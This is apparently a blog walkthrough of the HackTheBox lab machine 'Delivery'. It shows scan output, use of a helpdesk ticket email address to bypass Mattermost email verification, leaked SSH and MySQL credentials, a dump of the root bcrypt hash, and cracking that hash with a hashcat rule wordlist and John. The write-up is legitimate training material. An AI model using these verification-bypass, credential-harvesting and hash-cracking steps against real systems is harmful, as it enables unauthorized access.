TL;DR
This is a walkthrough writeup on Delivery which is a Linux box categorized as easy on HackTheBox, created by our messiah Ippsec. This box has Mattermost and osTicket running on it. The initial foothold was gained by impersonating email to read the Mattermost server chat which revealed the SSH credentials. Privilige Escalation required us to enumerate the box to find the root password hash & use a hashcat rule-based attack to crack the hash.
Delivery Writeup: Scanning Network
Running the usual Nmap port scan :
Command used : nmap -sC -sV -A -v -n -Pn -oN nmap.initial 10.10.10.222
Nmap scan report for 10.10.10.222
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Welcome
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
8065/tcp open unknown
| fingerprint-strings:
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Thu, 09 Dec 2021 06:47:37 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: p1pj5pjd4if63xr8umufmyhxse
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Thu, 09 Dec 2021 07:09:06 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Thu, 09 Dec 2021 07:09:07 GMT
|_ Content-Length: 0We got 3 ports to deal with :
port 22port 80port 8065 : unknown
Website Enumeration
Port 80
We went ahead and visited port 80 in our browser :
port 80
Okay, so from this message it seems like that a mattermost server is running on the box, and only a user with @delivery.htb email address has access to Delivery’s mattermost server.
We also found an external link going to helpdesk.delivery.htb
So, I edited the /etc/hosts file and added the following entry, to ensure DNS resolution by our local machine for this domain :
10.10.10.222 helpdesk.delivery.htbWe have a service called as osTicket running on helpdesk.delivery.htb .
What is osTicket ? osTicket is a widely used and trusted open source support ticketing system which easily scales and streamline your customer service and drastically improve your customer's experience. It seamlessly integrates inquiries created via email, phone and web-based forms into a simple easy-to-use multi-user web interface. You can read more about it here.
We will come back to this later.
Port 8065
We have a Mattermost server running on this port.
What is Mattermost ? Mattermost is an open-source, self-hostable online chat service with file sharing, search, and integrations. It is designed as an internal chat for organisations and companies, and mostly markets itself as an open-source alternative to Slack and Microsoft Teams. You can read more about it here.
port 8065We can create a new account here, but it will send a email verification link, and we can’t use third party email clients like gmail, because the machine is in HTB’s internal network and it wont be able to send anything outside the internal network.
Also, deducing from the message that we got earlier (in the “contact us” panel), about being able to access the Mattermost server for Delivery only if a user has a @delivery.htb email address.
We might need to somehow get access to a @delivery.htb email address.
Enumerating the osTicket Service
I filled up the details & opened a new ticket.
We are given a confirmation about a new ticket being opened.
Along with which, it also tell us that if we want to add more information to our ticket we can email it to <ticket_number>@delivery.htb
Obviously we can sense something potential here π
Checking the Ticket Status
On checking the ticket status we can see the information that we provided in the ticket.
Initial Foothold (email impersonation)
According to the message given earlier, we can add information to our ticket by sending a email to the following email address <ticket_num>@delivery.htb . So, we can use this email <ticket_num>@delivery.htb in the mattermost signup process, and the verification email link will be sent to it & added to the ticket information which we can view it here in the ticket status section.
Signing up on Mattermost with the above email :
Viewing the “email verification link” added in the ticket information :
After completing the email verification process by visiting the the verification link, we can access the “Internal” channel on the Mattermost server.
There’s a lot of juicy information in the chat here :
Credentials to the server ->
user : maildeliverer
pass : Youve_G0t_Mail!Delivery Writeup: User Flag β³
SSH into the box using the obtained credentials :
ββ[root@kali]β[/opt/jd-gui]
ββββΌ ssh maildeliverer@10.10.10.222
maildeliverer@10.10.10.222's password:
Last login: Thu Nov 24 08:12:11 2021 from 10.10.14.4
maildeliverer@Delivery:~$ whoami
maildeliverer
maildeliverer@Delivery:~$ cat user.txt
4twqf****************************Delivery Writeup: Privilege Escalation
During system enumeration, we found this config file for mattermost :
maildeliverer@Delivery:/$ cat /opt/mattermost//config/config.jsonIt revealed the MySQL databse credentials :
SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
},MySQL credentials
Database : mysql
user : mmuser
pass : Crack_The_MM_Admin_PWWe can see the obvious hint here that is been given off by the passsword. We need to find the password hash for the root user in the database and crack it π
So, I went ahead and tried to connect to the MySQL database:
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 91
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mattermost]> show tables;
+------------------------+ [8/439]
| Tables_in_mattermost |
+------------------------+
| Audits |
| Bots |
| ChannelMemberHistory |
| ChannelMembers |
| Channels |
| ClusterDiscovery |
| CommandWebhooks |
| Commands |
| Compliances |
| Emoji |
| FileInfo |
| GroupChannels |
| GroupMembers |
| GroupTeams |
| IncomingWebhooks |
| Jobs |
| Licenses |
| LinkMetadata |
| OAuthAccessData |
| OAuthApps |
| OAuthAuthData |
| OutgoingWebhooks |
| PluginKeyValueStore |
| Posts |
| Preferences |
| ProductNoticeViewState |
| PublicChannels |
| Reactions |
| Roles |
| Schemes |
| Sessions |
| SidebarCategories |
| SidebarChannels |
| Status |
| Systems |
| TeamMembers |
| Teams |
| TermsOfService |
| ThreadMemberships |
| Threads |
| Tokens |
| UploadSessions |
| UserAccessTokens |
| UserGroups |
| UserTermsOfService |
| Users |
+------------------------+
46 rows in set (0.001 sec)
MariaDB [mattermost]> select * from Users;
-----------SNIP-------------------
0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL |
| root@delivery.htb | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"n
ever","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 |
-----------SNIP-------------------
----- Writing a query to get a readable output -----
MariaDB [mattermost]> select username,password,email,roles from Users where username='root';
+----------+--------------------------------------------------------------+-------------------+--------------------------+
| username | password | email | roles |
+----------+--------------------------------------------------------------+-------------------+--------------------------+
| root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | root@delivery.htb | system_admin system_user |
+----------+--------------------------------------------------------------+-------------------+--------------------------+
1 row in set (0.001 sec)We found root’s password hash:
root hash
root : $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjOInstead of straightaway rushing to hashcat or johnTheRipper, let’s look back & recall the message that we got in the mattermost server chat about cracking the hashes of passwords like PleaseSubscribe! by using hashcat rules.
We can generate a wordlist containing different variations of the word PleaseSubscribe! using hashcat rules. It will generate a very small wordlist.
What is hashcat rule-based attack ? The rule-based attack is like a programming language designed for password candidate generation. It has functions to modify, cut or extend words and has conditional operators to skip some, etc. That makes it the most flexible, accurate and efficient attack. You can read more about it here.
You can check all available hashcat rules in /usr/share/hashcat/rules/. We will be using the best64 rule in our case to generate the wordlist.
βββ(rootπkali)-[~/Desktop/Boxes/HTB/Delivery]
ββ echo PleaseSubscribe! | hashcat -r /usr/share/hashcat/rules/best64.rule --stdout > wordlist.txt
βββ(rootπkali)-[~/Desktop/Boxes/HTB/Delivery]
ββ wc -l wordlist.txt
77 wordlist.txt
Now, using JohnTheRipper to crack the hash with help of the wordlist that we just created.
βββ(rootπkali)-[~/Desktop/Boxes/HTB/Delivery]
ββ# john hash.txt --wordlist=wordlist.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PleaseSubscribe!21 (?)
1g 0:00:00:00 DONE (2021-12-09 05:40) 2.702g/s 97.29p/s 97.29c/s 97.29C/s PleaseSubscribe!..PleaseSubscrio
Use the "--show" option to display all of the cracked passwords reliably
Session completedWe have successfully cracked the password hash for root.
user : root
pass : PleaseSubscribe!21All we need to do now is change the user to root using the su root command.
Delivery Writeup: Root Flag β³
maildeliverer@Delivery:/opt/mattermost/config$ su root
Password:
root@Delivery:/opt/mattermost/config# id
uid=0(root) gid=0(root) groups=0(root)
root@Delivery:/opt/mattermost/config# cat /root/root.txt
2dbd****************************Kudos for successfully rooting Delivery.
Until next time, do checkout other informative writeups and blogs here.
